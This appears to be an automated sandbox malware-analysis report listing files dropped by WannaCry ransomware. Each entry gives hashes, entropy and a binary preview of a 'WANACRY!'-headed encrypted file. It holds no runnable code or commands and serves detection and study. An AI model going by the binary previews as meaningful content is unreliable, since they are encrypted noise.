                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20568
                                                                              Entropy (8bit):7.992297934009613
                                                                              Encrypted:true
                                                                              SSDEEP:384:vA4kuzSh+U7QgUcC34Oyj5y3N4z3rEI/9LUJNHHMrJSDQn:vA4Vz2LU/3tcgNk/+J9UkEn
                                                                              MD5:A8DAA99123FB26D8C66D74FD77D85DDD
                                                                              SHA1:F1642C331B23B0E6D741DEED138803096EAFE718
                                                                              SHA-256:615820ACF01104C41E090AD6B804213377A6A37CC719B03C207CEC656D00661A
                                                                              SHA-512:82A824AF5454CBB9B5E438509420C417D08CEDC93F8A4A4BD3F34DF5EEE7730E6F6AEF575A2946BB2814EA3E1E6290322DC8EF5379CF3C756051A7ECB8FA54F4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....Apd..o.x.80ybM....@..&.#m[+..6-z'.n._sz...n[(.l.FuXa.....Z;..x#.{k.]...M.|.+.]..k..n..)=&Y...t....>r....%M...}j..]....w.........C.~.ZSA.94G....R.L!..;9.c.R.......yX`i.`.2E....=.....B...:A.....1.0...w`&..8S.$j;..g..../..E..8...1..\......$...F.....4O......OW......\0<N...._9......R..U....Kla..\.Y...I5.....rm.<.&3../W.......z.d....M.<..sm....}.$....n...Q......N_S.3~k.Kt0c....A..v...&....f...=.......@.... t*..o..V.n....[..kg.M...N...;...e....L'....M..}.X[ede.y..: e...\.F....g..9...'......U.Q,... 8...D.u.-.T&`..U.....c..s....\......5.....E$..|........1H.b.vG..........;n.-..2$.{>....W..7!V.1.@.D...4...r"..H.JH...}.....u..NCRX.H.QIV..g.....%.0.S......*.$.6ppD..b.....[.. V.'j.c.P...%..(R..*..V.F..*X...+.....c........a..Dd..E..........|...]..........-C....".-v8t.........2...$.l*...../..i;....c...'..U.=#.x~K.......G...u,1j :...}'.i.....v..].~.W...6..x".p....S.....rX&.....\..+...c...~../.......3BCq.(....%.8=.R ....G?=..........j..+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999882213110332
                                                                              Encrypted:true
                                                                              SSDEEP:49152:Hf0Y0yz+G03Q0rhJ8mgFtWBWfCrjCVLMxgBW:H8Ryz+Gi5b8mgfWBrCVL4gBW
                                                                              MD5:6F1A212B6B6E7BEBBFCD29157377ED04
                                                                              SHA1:099677F13858D43A5D39C63B1F13507A05F0C997
                                                                              SHA-256:652CF53F011E2D6401D2B9147C34A27F96E7FCCDE99A3F220B3109A38D1E3405
                                                                              SHA-512:A034E905ED4B6914ACDFAB1F925ADB70D5B201A30641F402F36584555F335EF322AC141CC3C4D7AAC711CB5921D3EFAF1414110A5DA00E931FBC08E9E2B53CBB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....<.mn..U.KY......z!....V.L.48`.H..=;|......}..@_.g..3....D?B.^....=GF-J._.:.(..).\...vt.oN..x..t.S.k.Q.U.+......:...E..~...u$...f.a6'...+d........b.......-..I.b6.B....;.r|.w_"p....../...$&...bk(.n..K...2..k.I.Or...."..*.S....u..-.y..)...$.?..#.............P.,.)..tH....Jj.=..@V...G..+o.u.4...fL.......K.Gj{.Z...B"..E65>.+.Nt..._.......Zq..UD..Am.w..IlNS(I.m.N...o...A.Z._.B.:......]q....p..$Enf.Lt..)+...QRZ/.(m.Yw.u.n..a..]...C..[..W.....u.'...y....t..$.N].........`...5n`.r..9.7.$.MV.zi~..B.:ctQb.?.wln..&OpDAJ".Ts..:e^i..|v..fdz6.5......{..(t...m.[.~!}?.w.....}U....Lwa.(n.}o6....`....veZ.....;..*B.Q'mVB_...V ...|}.c..vI...|..w.SOh.H....+O.Dr...q............~....g....c.....J.|F...-.1,..72...d..B.L.H...O.}/....y.[..={..uI.....EcY....s.3. .E.qU.Y...9U...P...y.3lJ.[...~.g..2.)d....ql.#...1n.....1..W>.UX[#..=....\....1..._.z!...f.jg.AjK...N..f.'....x........xO.....z....-H...,.........9...L[.54j,I..!+.....[.zD.h<v&mG....)|.3.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999882213110332
                                                                              Encrypted:true
                                                                              SSDEEP:49152:Hf0Y0yz+G03Q0rhJ8mgFtWBWfCrjCVLMxgBW:H8Ryz+Gi5b8mgfWBrCVL4gBW
                                                                              MD5:6F1A212B6B6E7BEBBFCD29157377ED04
                                                                              SHA1:099677F13858D43A5D39C63B1F13507A05F0C997
                                                                              SHA-256:652CF53F011E2D6401D2B9147C34A27F96E7FCCDE99A3F220B3109A38D1E3405
                                                                              SHA-512:A034E905ED4B6914ACDFAB1F925ADB70D5B201A30641F402F36584555F335EF322AC141CC3C4D7AAC711CB5921D3EFAF1414110A5DA00E931FBC08E9E2B53CBB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....<.mn..U.KY......z!....V.L.48`.H..=;|......}..@_.g..3....D?B.^....=GF-J._.:.(..).\...vt.oN..x..t.S.k.Q.U.+......:...E..~...u$...f.a6'...+d........b.......-..I.b6.B....;.r|.w_"p....../...$&...bk(.n..K...2..k.I.Or...."..*.S....u..-.y..)...$.?..#.............P.,.)..tH....Jj.=..@V...G..+o.u.4...fL.......K.Gj{.Z...B"..E65>.+.Nt..._.......Zq..UD..Am.w..IlNS(I.m.N...o...A.Z._.B.:......]q....p..$Enf.Lt..)+...QRZ/.(m.Yw.u.n..a..]...C..[..W.....u.'...y....t..$.N].........`...5n`.r..9.7.$.MV.zi~..B.:ctQb.?.wln..&OpDAJ".Ts..:e^i..|v..fdz6.5......{..(t...m.[.~!}?.w.....}U....Lwa.(n.}o6....`....veZ.....;..*B.Q'mVB_...V ...|}.c..vI...|..w.SOh.H....+O.Dr...q............~....g....c.....J.|F...-.1,..72...d..B.L.H...O.}/....y.[..={..uI.....EcY....s.3. .E.qU.Y...9U...P...y.3lJ.[...~.g..2.)d....ql.#...1n.....1..W>.UX[#..=....\....1..._.z!...f.jg.AjK...N..f.'....x........xO.....z....-H...,.........9...L[.54j,I..!+.....[.zD.h<v&mG....)|.3.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999864799784215
                                                                              Encrypted:true
                                                                              SSDEEP:49152:gjoPD1MtvGEdvyYJAgXontpkXln6/b8eC1Oh:rL1TS/BXEypg2y
                                                                              MD5:2370D85BCD9091D53352581AE4EF995A
                                                                              SHA1:62AD10AAC16DA066E6776476FDA62E3FC4C8778E
                                                                              SHA-256:C40A08EAAA51099836BBCBE2ECA575A0FE92AE52E736BB852CAF1F3910BBC245
                                                                              SHA-512:833BCE3033A8D91BAB2D422DC418F501A286AAD82547BE44C9C84A7F07CEB82E918E250F55128A7F109F84C69199BD530D495E23FCFEEDB8442BE217353D7F29
                                                                              Malicious:true
                                                                              Preview:WANACRY!....mN..... Mo.X?.5..../_....k'')Gc).w........+.40...q.ME..i6i....2.9u.;...h..;&D\^>........W.@~..#..Uk@.0...a....=c....\@....<[.<.{..0?..+#...4..G'AR....*<......=L.m.u.)...p...........s.#..D`..._..T...2>-~.%.S.......7.UXK......p.i...H.1....l..............4f....4.....A.........)..J..p..lQ......lt\.|Bg....x...h......%O......b22{t#-e..O..p0wz...+|..'.?9..........^..%...u*.7....P....F..k"...#.K.a.+...|........ 4.nzx.......3.$F..r.U........u^...\:.u...........6...<kD?...;.F..x.Ft..C.9E......f,X,.C-.....&.e....5..|..?'u.:.<..Q.V...1..y..(h_$..f.E...o#S....h..61..h..<........U..&..H..-..............S...J,..*..I....0.H..\.t..'..........lh.PhIEg-K...<..n...|..I..?...}.4E..<.x".....%t..$.....5.(..Ab.0.v......4..b:.p..4..{..L..#....6.m/.n.j.{._.G}..H...^...q+[@...,x.<.?._[Xd..Q....X..\;....,.C.W~.$..i).V........q....B.8..Ds.2..B...;.........&..R[....E..R`....{...6!..Q.W.J.3.J..*rg|.B..7.D.+......f.%$m.&Y.R..8....:...wN.....&...cn.."._...v3.8.eU...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999864799784215
                                                                              Encrypted:true
                                                                              SSDEEP:49152:gjoPD1MtvGEdvyYJAgXontpkXln6/b8eC1Oh:rL1TS/BXEypg2y
                                                                              MD5:2370D85BCD9091D53352581AE4EF995A
                                                                              SHA1:62AD10AAC16DA066E6776476FDA62E3FC4C8778E
                                                                              SHA-256:C40A08EAAA51099836BBCBE2ECA575A0FE92AE52E736BB852CAF1F3910BBC245
                                                                              SHA-512:833BCE3033A8D91BAB2D422DC418F501A286AAD82547BE44C9C84A7F07CEB82E918E250F55128A7F109F84C69199BD530D495E23FCFEEDB8442BE217353D7F29
                                                                              Malicious:true
                                                                              Preview:WANACRY!....mN..... Mo.X?.5..../_....k'')Gc).w........+.40...q.ME..i6i....2.9u.;...h..;&D\^>........W.@~..#..Uk@.0...a....=c....\@....<[.<.{..0?..+#...4..G'AR....*<......=L.m.u.)...p...........s.#..D`..._..T...2>-~.%.S.......7.UXK......p.i...H.1....l..............4f....4.....A.........)..J..p..lQ......lt\.|Bg....x...h......%O......b22{t#-e..O..p0wz...+|..'.?9..........^..%...u*.7....P....F..k"...#.K.a.+...|........ 4.nzx.......3.$F..r.U........u^...\:.u...........6...<kD?...;.F..x.Ft..C.9E......f,X,.C-.....&.e....5..|..?'u.:.<..Q.V...1..y..(h_$..f.E...o#S....h..61..h..<........U..&..H..-..............S...J,..*..I....0.H..\.t..'..........lh.PhIEg-K...<..n...|..I..?...}.4E..<.x".....%t..$.....5.(..Ab.0.v......4..b:.p..4..{..L..#....6.m/.n.j.{._.G}..H...^...q+[@...,x.<.?._[Xd..Q....X..\;....,.C.W~.$..i).V........q....B.8..Ds.2..B...;.........&..R[....E..R`....{...6!..Q.W.J.3.J..*rg|.B..7.D.+......f.%$m.&Y.R..8....:...wN.....&...cn.."._...v3.8.eU...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):126360
                                                                              Entropy (8bit):7.998527403244411
                                                                              Encrypted:true
                                                                              SSDEEP:3072:5xkO4NCknTpi2dHeKr0yR1NC3nR0u1EGQ4hT2aAPoV:5xkO4NCgdl7rPG3nR0uOgl2fK
                                                                              MD5:3F367EDB5EA362580E5110ACEEE5127A
                                                                              SHA1:CFA04938DE548516766E1991B839864F14DFC079
                                                                              SHA-256:06369FDCD4892FA56D5EB6F06DCC24B7ADC9CFD860F3E8BF0B8A07F3DBC246DA
                                                                              SHA-512:5A03FD3EE7D230483DD47E2302179E6C0E5D51C10506A20B1A8E7E00618E016CF53563D257CA9B26D150DAE2E47772DCFEE983A2D64DC4A3E2B0312A38DAD46F
                                                                              Malicious:true
                                                                              Preview:WANACRY!......kI.`.+d5....EE}eE..w..C._:eu.]....u..T..V...?........f..S....d...S...fZcp._d..;...0...V&+].X..".....T.=*d.........9KI.y..J......B[.......%VX.HhN.C.-...4.?.......t...>.lm.....V...................,..%...[..C.;.*jp..Z.h. >....n.H<\.^.B.......@..............'.|M/y..vv.j5..7...kh0..8.kX.....;7ak.%.$....<....&.?NV..Q_.p..\v...|k.#.E..5....~...$p.._.W...j..c.o.O5[....~..!C.."}+G...r........!...-...3.*f.)9....>v.n.q.u......@.2.%_G...P..+..N..S.J..................>.DW.....t[O,.+..0.W.....g:./...C$L.b.8C8S..C7.]...f6....)2V...\uL.7%lYSm...`/..n.oBH.l.....2.W2.......K6.`.%..6....+f......B...d..M.9.?G2...T....p.$>..5o..L:.Nl..N.\W.b..s..~.s......._...=.]P.......]..p..K.Y....\u'....3g6.].8.M.0..UjzCm.....,...OT>.9.).....}.....6+P......N..f..4..3.>..7...@CQ...In....HUL.bF.~2.........u...(N.[..-.j..<%.qq8.......}........Fj.s.u..TD>h..%.....4.Jt&)X.a>..p... .L%.x:.R.....D.%hgxv.'....l......<.}.pQ..Q....=....Rj%....,"....O..\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):126360
                                                                              Entropy (8bit):7.998527403244411
                                                                              Encrypted:true
                                                                              SSDEEP:3072:5xkO4NCknTpi2dHeKr0yR1NC3nR0u1EGQ4hT2aAPoV:5xkO4NCgdl7rPG3nR0uOgl2fK
                                                                              MD5:3F367EDB5EA362580E5110ACEEE5127A
                                                                              SHA1:CFA04938DE548516766E1991B839864F14DFC079
                                                                              SHA-256:06369FDCD4892FA56D5EB6F06DCC24B7ADC9CFD860F3E8BF0B8A07F3DBC246DA
                                                                              SHA-512:5A03FD3EE7D230483DD47E2302179E6C0E5D51C10506A20B1A8E7E00618E016CF53563D257CA9B26D150DAE2E47772DCFEE983A2D64DC4A3E2B0312A38DAD46F
                                                                              Malicious:true
                                                                              Preview:WANACRY!......kI.`.+d5....EE}eE..w..C._:eu.]....u..T..V...?........f..S....d...S...fZcp._d..;...0...V&+].X..".....T.=*d.........9KI.y..J......B[.......%VX.HhN.C.-...4.?.......t...>.lm.....V...................,..%...[..C.;.*jp..Z.h. >....n.H<\.^.B.......@..............'.|M/y..vv.j5..7...kh0..8.kX.....;7ak.%.$....<....&.?NV..Q_.p..\v...|k.#.E..5....~...$p.._.W...j..c.o.O5[....~..!C.."}+G...r........!...-...3.*f.)9....>v.n.q.u......@.2.%_G...P..+..N..S.J..................>.DW.....t[O,.+..0.W.....g:./...C$L.b.8C8S..C7.]...f6....)2V...\uL.7%lYSm...`/..n.oBH.l.....2.W2.......K6.`.%..6....+f......B...d..M.9.?G2...T....p.$>..5o..L:.Nl..N.\W.b..s..~.s......._...=.]P.......]..p..K.Y....\u'....3g6.].8.M.0..UjzCm.....,...OT>.9.).....}.....6+P......N..f..4..3.>..7...@CQ...In....HUL.bF.~2.........u...(N.[..-.j..<%.qq8.......}........Fj.s.u..TD>h..%.....4.Jt&)X.a>..p... .L%.x:.R.....D.%hgxv.'....l......<.}.pQ..Q....=....Rj%....,"....O..\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15224
                                                                              Entropy (8bit):7.986542716906041
                                                                              Encrypted:false
                                                                              SSDEEP:192:IhuWWkKriKrQ0gTrHWTuGwI3n/Ty6yxbWWzGmSP/ejq8ePd4kFCdsOjKJ6oT/fWC:CQrpqIbybxiuGxYod4GCdsIS6U/fikxJ
                                                                              MD5:02AFBDC40841BE0987C2023DADA13EA6
                                                                              SHA1:D1DE4223B20919025E75BCBEDB6DB4C5F05EAB04
                                                                              SHA-256:959552C043FC05596AEC990E879DCA2C3C63DE9E80D8FFF60F0A3A310217A14A
                                                                              SHA-512:8C36FFA4E605ABA2A0FAE730F9C7EB7BCA92705F9B7302E23FBEE06CAD76029A63C7514F17FA65DFB1B3D2E2C15B14AC6C81F3EABA0876CD16DCEBE47185AE58
                                                                              Malicious:false
                                                                              Preview:WANACRY!......K. ....KKyR..1...9j..7...O...~..gT&K.........Z...!..}..~...]DX...c.{.xp..$Ph.[.e+.s..0Q..Z.8.}.OB.U.wm.d..E..=.(......2....Js.P..A.C8..X.(!...*K...b.z.U.%.$.... v.JR^...$....g}/..M.~.....J......Q.C"...w...4;.....)"gW.......x.=y.\5.R....;.[C......Q:..........If..|]...lh.../..L.)\..Xi..3.6)..X..S... H.`..h~K5.."Nv.Fw.%..2...,\....)x'/}...]%v...f1....EpcB...m^...;a.?!q...9...k...(.p....*0zz..?..2QB......F}........N.~.......!E..h.!.s.'..4y.i.Z1..|.....U....Y...._..@.i..u...8.....K...{.5%.q...Y.b%.....d!..j..X.~=.j+..ymV.^.N.%.7..-.......*....ff..]..g....>I|>=<*W.._Mz..;.{....:\>...u.!n..s.C.{..;.....K..].$.}. %.Xx6Ft.N.._..I.....L.U....J(.POy!...xD..F..BuP....S..H9...?1(...5...x.2..5...1c@.Y*2..Bj.8q@....8..d.Wp...b.r.2>Mf$&.nu...).(3.)wu.c.L.k.L.b0....aY....e.Um....$"...H._.-..{.`.qqfN_....j-\v.h.E.<>....vf...o..1"D....."....o......B%.1..2h{...>U.Z..a...p.....H8`ZP..G.:O....^U15e....CG.....h>....DS.C<........u..i.a^`.......$.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15224
                                                                              Entropy (8bit):7.986542716906041
                                                                              Encrypted:false
                                                                              SSDEEP:192:IhuWWkKriKrQ0gTrHWTuGwI3n/Ty6yxbWWzGmSP/ejq8ePd4kFCdsOjKJ6oT/fWC:CQrpqIbybxiuGxYod4GCdsIS6U/fikxJ
                                                                              MD5:02AFBDC40841BE0987C2023DADA13EA6
                                                                              SHA1:D1DE4223B20919025E75BCBEDB6DB4C5F05EAB04
                                                                              SHA-256:959552C043FC05596AEC990E879DCA2C3C63DE9E80D8FFF60F0A3A310217A14A
                                                                              SHA-512:8C36FFA4E605ABA2A0FAE730F9C7EB7BCA92705F9B7302E23FBEE06CAD76029A63C7514F17FA65DFB1B3D2E2C15B14AC6C81F3EABA0876CD16DCEBE47185AE58
                                                                              Malicious:false
                                                                              Preview:WANACRY!......K. ....KKyR..1...9j..7...O...~..gT&K.........Z...!..}..~...]DX...c.{.xp..$Ph.[.e+.s..0Q..Z.8.}.OB.U.wm.d..E..=.(......2....Js.P..A.C8..X.(!...*K...b.z.U.%.$.... v.JR^...$....g}/..M.~.....J......Q.C"...w...4;.....)"gW.......x.=y.\5.R....;.[C......Q:..........If..|]...lh.../..L.)\..Xi..3.6)..X..S... H.`..h~K5.."Nv.Fw.%..2...,\....)x'/}...]%v...f1....EpcB...m^...;a.?!q...9...k...(.p....*0zz..?..2QB......F}........N.~.......!E..h.!.s.'..4y.i.Z1..|.....U....Y...._..@.i..u...8.....K...{.5%.q...Y.b%.....d!..j..X.~=.j+..ymV.^.N.%.7..-.......*....ff..]..g....>I|>=<*W.._Mz..;.{....:\>...u.!n..s.C.{..;.....K..].$.}. %.Xx6Ft.N.._..I.....L.U....J(.POy!...xD..F..BuP....S..H9...?1(...5...x.2..5...1c@.Y*2..Bj.8q@....8..d.Wp...b.r.2>Mf$&.nu...).(3.)wu.c.L.k.L.b0....aY....e.Um....$"...H._.-..{.`.qqfN_....j-\v.h.E.<>....vf...o..1"D....."....o......B%.1..2h{...>U.Z..a...p.....H8`ZP..G.:O....^U15e....CG.....h>....DS.C<........u..i.a^`.......$.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):59896
                                                                              Entropy (8bit):7.996720256243556
                                                                              Encrypted:true
                                                                              SSDEEP:1536:z99BH5AQdt2oIJqMxT49T2otKP8GkzFCdjMOvtcUX8n5:z93VrIJqMh49ScU8IjMsGW8n5
                                                                              MD5:9AEEDFC34AFA05D738DA5838E4FD51C6
                                                                              SHA1:42E91EE5203C43064F3C56508A78350BA3E49447
                                                                              SHA-256:F6C65DD85CCFB113E5A3EC317FFC5EE00CB3A7C8DA77B9E2DB7EF93A4CE21128
                                                                              SHA-512:B74C30DA567ED664D7392F7B1AC1383EA83A7FDEAD39EB6CDBBCA8605B25A818B921A3485677459C02457DBE6F409604302012439141ABE3D271ADFB311C837B
                                                                              Malicious:true
                                                                              Preview:WANACRY!....8..q...>@.. 9.<d?.o.4I.. ..=4~...#.?..........y.?edh%6@.2U.5q..l..7.p..K.@.W|..=1.+F.O.#.j"...h.0....A].......4y.1.x.Mh.......P......Je.m..W++.....=V.,...../.{W+h....z..*6$......|.1..!./..\....M5.K.ej.^].i,M8...^][H.#(..vN..+...).V.1..%H\p......................M.....#-F!......."I..U...\....wZ8.4....6..h.7.d"vI-.B)..........&.ap."d.#.T..%.X.....JO.meU.{+g.Vi.?._.X..H...?.^Z..S..1w9q.:....N.....#JSo.^....G9Y.....6w2N....3.......8\.......]pB...~.].M..=v&...B.........7.......z../}...I...E...w8..N"..w...l@*....i...ZF..._.s....B.Z....2.o.M-..O....p.s.B.......[.GC........8{j....i^H.~z..}.m[....cp..O..!..Rt.b.).S...3....+.....F.|.T..cs..72.J.K.P..h....+qE.L=....6]}...B..|Q...})=3%jv.p.e........T.8R&..Vs...L.a.#.`.m.{.6............70..R. ....F......&A.w.o...,i.ael.LHR.-U.._.i.s.)....J._8.+:...w...r...Y\2...[.i....!^.....Qcd.....~....#H.:81/.H...?.y.L.x...[...i&bh...#B.@....G:.H.X~'S.:...AR..2.1..D._H.@..z1.-V.+.'...!p..0.).F...`6.<.x'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):59896
                                                                              Entropy (8bit):7.996720256243556
                                                                              Encrypted:true
                                                                              SSDEEP:1536:z99BH5AQdt2oIJqMxT49T2otKP8GkzFCdjMOvtcUX8n5:z93VrIJqMh49ScU8IjMsGW8n5
                                                                              MD5:9AEEDFC34AFA05D738DA5838E4FD51C6
                                                                              SHA1:42E91EE5203C43064F3C56508A78350BA3E49447
                                                                              SHA-256:F6C65DD85CCFB113E5A3EC317FFC5EE00CB3A7C8DA77B9E2DB7EF93A4CE21128
                                                                              SHA-512:B74C30DA567ED664D7392F7B1AC1383EA83A7FDEAD39EB6CDBBCA8605B25A818B921A3485677459C02457DBE6F409604302012439141ABE3D271ADFB311C837B
                                                                              Malicious:true
                                                                              Preview:WANACRY!....8..q...>@.. 9.<d?.o.4I.. ..=4~...#.?..........y.?edh%6@.2U.5q..l..7.p..K.@.W|..=1.+F.O.#.j"...h.0....A].......4y.1.x.Mh.......P......Je.m..W++.....=V.,...../.{W+h....z..*6$......|.1..!./..\....M5.K.ej.^].i,M8...^][H.#(..vN..+...).V.1..%H\p......................M.....#-F!......."I..U...\....wZ8.4....6..h.7.d"vI-.B)..........&.ap."d.#.T..%.X.....JO.meU.{+g.Vi.?._.X..H...?.^Z..S..1w9q.:....N.....#JSo.^....G9Y.....6w2N....3.......8\.......]pB...~.].M..=v&...B.........7.......z../}...I...E...w8..N"..w...l@*....i...ZF..._.s....B.Z....2.o.M-..O....p.s.B.......[.GC........8{j....i^H.~z..}.m[....cp..O..!..Rt.b.).S...3....+.....F.|.T..cs..72.J.K.P..h....+qE.L=....6]}...B..|Q...})=3%jv.p.e........T.8R&..Vs...L.a.#.`.m.{.6............70..R. ....F......&A.w.o...,i.ael.LHR.-U.._.i.s.)....J._8.+:...w...r...Y\2...[.i....!^.....Qcd.....~....#H.:81/.H...?.y.L.x...[...i&bh...#B.@....G:.H.X~'S.:...AR..2.1..D._H.@..z1.-V.+.'...!p..0.).F...`6.<.x'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1240
                                                                              Entropy (8bit):7.844163821377555
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjV+MfYiLTkrLJcL9J8e4Pz4EY27oYPcIXspY7Xd1XIhLqKACC2sn:bkpxfYoTkrLJaIzZYSPzXs+7Xd1KLbnG
                                                                              MD5:C112323823C4AA94213BFEF7E82AC064
                                                                              SHA1:A0966F3BBAD3B50ED12BBC499A28C22EF3F3DEA3
                                                                              SHA-256:705263781222F6E968DEA21D0F407D6EB6425EEB119A3342F666F1B3395BD1AA
                                                                              SHA-512:99DC668BB846558E1A368FC276E44C3EDEDE11881B4F41394E1807F7B771FBA8C0E8CEC4CB40C9CA688BEC8C07BF28CA1EF39523A03F3E108D28F3DE3A73A8D9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....PM.B..f:R......o.I...k .....$*,7.../.q..:..|@.(@..@]...c.4.Td;.".:t.f..#.e..rd..z...X.c..n;lS.7.J. %......7}.YfO..@...Mn.q..q<m..v.Lj..=...O...^.gU...#.E.~p.p..?="'2f.z......L.=.Rg....A_r.^#f...^..9P...Z@H.d.$.O8.i......A../..m.kT.W.T...$...u......Y............bl..q|.....3B..#8.$...CM.....Z.m^-!'...0.....J..j>R.nk..T..WM............|<...<...X]^.zb"....$..n...&WtS.......{Rx..AB1..6..d.......T.n....H...[q.Z.......j.].f...a.a.q.]. b.s....TIl...|}o.....U)..}..09-..Q......+Jp...n.U.O.......i[...]..B.&..y`.|#.......j'..Z...J....^.j.@......o........OI.{p.I.~&....w.....Hz..:......N.B...m.F=.M~C.T.`..FHNHy...V.j..2.~6........\!o.>db&.AG}.&u.7Nj3!.|GW..\.?...t... .!....x..v.....I.....^+rm{.e.....Z.(.r...!.z(}Yg.Ft..F..]w....t"..8...N..Jz7G1.fG.@..#v.}.^.r...._.'.ig.8.....'.C..F.T..WZ.......;7..Z...Bk..N..?vc.,...v75[.+..N.N./.....t;.7<*.7.s..{.U4H*T-M,........z.g........@N ..V....\Enn.;..D..V..*.....]*.-...u.Y...uh.:.TK.Dl..q1e..ui...FR=R..c$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1240
                                                                              Entropy (8bit):7.844163821377555
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjV+MfYiLTkrLJcL9J8e4Pz4EY27oYPcIXspY7Xd1XIhLqKACC2sn:bkpxfYoTkrLJaIzZYSPzXs+7Xd1KLbnG
                                                                              MD5:C112323823C4AA94213BFEF7E82AC064
                                                                              SHA1:A0966F3BBAD3B50ED12BBC499A28C22EF3F3DEA3
                                                                              SHA-256:705263781222F6E968DEA21D0F407D6EB6425EEB119A3342F666F1B3395BD1AA
                                                                              SHA-512:99DC668BB846558E1A368FC276E44C3EDEDE11881B4F41394E1807F7B771FBA8C0E8CEC4CB40C9CA688BEC8C07BF28CA1EF39523A03F3E108D28F3DE3A73A8D9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....PM.B..f:R......o.I...k .....$*,7.../.q..:..|@.(@..@]...c.4.Td;.".:t.f..#.e..rd..z...X.c..n;lS.7.J. %......7}.YfO..@...Mn.q..q<m..v.Lj..=...O...^.gU...#.E.~p.p..?="'2f.z......L.=.Rg....A_r.^#f...^..9P...Z@H.d.$.O8.i......A../..m.kT.W.T...$...u......Y............bl..q|.....3B..#8.$...CM.....Z.m^-!'...0.....J..j>R.nk..T..WM............|<...<...X]^.zb"....$..n...&WtS.......{Rx..AB1..6..d.......T.n....H...[q.Z.......j.].f...a.a.q.]. b.s....TIl...|}o.....U)..}..09-..Q......+Jp...n.U.O.......i[...]..B.&..y`.|#.......j'..Z...J....^.j.@......o........OI.{p.I.~&....w.....Hz..:......N.B...m.F=.M~C.T.`..FHNHy...V.j..2.~6........\!o.>db&.AG}.&u.7Nj3!.|GW..\.?...t... .!....x..v.....I.....^+rm{.e.....Z.(.r...!.z(}Yg.Ft..F..]w....t"..8...N..Jz7G1.fG.@..#v.}.^.r...._.'.ig.8.....'.C..F.T..WZ.......;7..Z...Bk..N..?vc.,...v75[.+..N.N./.....t;.7<*.7.s..{.U4H*T-M,........z.g........@N ..V....\Enn.;..D..V..*.....]*.-...u.Y...uh.:.TK.Dl..q1e..ui...FR=R..c$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):45736
                                                                              Entropy (8bit):7.9960897084021045
                                                                              Encrypted:true
                                                                              SSDEEP:768:CxSoCRGvEU9DgUzOdxs5hvsSTDDh1UU/b3ZN/Dw6InwE1YErdY5ocNv9B:WJCRqEU9DFzOdxMhvswDDhWUzJ56nwES
                                                                              MD5:C31B2D8FDD80EC84FE3A3D016A1ED223
                                                                              SHA1:A7ACF1D25AC2471096E5033B9A964D2263362F39
                                                                              SHA-256:0EDEAD059F3E00CAC48B29B68C34D1438052522985EAEBF0AA1E75B3DD510177
                                                                              SHA-512:5BE38D720A8C0B71A9425FB7F9FB5243F9A06CAD9240B43813FE08F0E3967D2885CE80AEDB4AD20653DF20D3A0DAAA0C81B4DEF6F0E85E79CE82993765AAF293
                                                                              Malicious:true
                                                                              Preview:WANACRY!....X..Z..ai.}Z../...?......]{P.L..x6h"1.7^.@...!.s..,.pr...`Y..<....+.B..mNJ. ..9X.Ml>a:.g....q...2......_[....6E..n.../..{.g.p...U.0<7.\(.;Qv....}+6.3.....e.O....\.d.4DXnW..S;..G.....t..~..e.v..G..9.40i.......F........V. .x7..2MR...J>..H......5.Q9..............f......j.v8.(...V...x.z/..&.{....A..AE.F.<......7B.g.y...b..v.+..M*3........u...U.M..i+T.....;...'.......-5...T.m...#h..X+~F.!c?...8.4.L....?h... ..Z....i8.D...b...3...K*...2.P....i.._.-.r...9.....z.......(.E..p.o.W.vy.B....j...O.{.&p....MF....f.....1..|b......e.R.....ZWk.g0.:...9.]..'s.^...5K^.YM.....=T...U5j.o......T.}/bJAYC{.0.+.hm-..v._..`.PEV.Q4'x...=#ZJ*.A[..)m..6.r.9.%..G.X.}....J_c......8....~..p.xc.C...N.%E&H.f.[..y.../.%u......PI.Ie[W..O$ b?...E.......F..6..s..v..U..^[.Nw[..6..${o...C..H..o.vH...q..%..p..b.>~r.+6]#.........".)...Q2..1.o1[.U....1..9.../...L..:.g.)@x.|...:..b..;...PX.Z...}jz....'.j.U.].....NX-.%...iW....].....58.SC....O....j.V...l....Ej.`...x{.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):45736
                                                                              Entropy (8bit):7.9960897084021045
                                                                              Encrypted:true
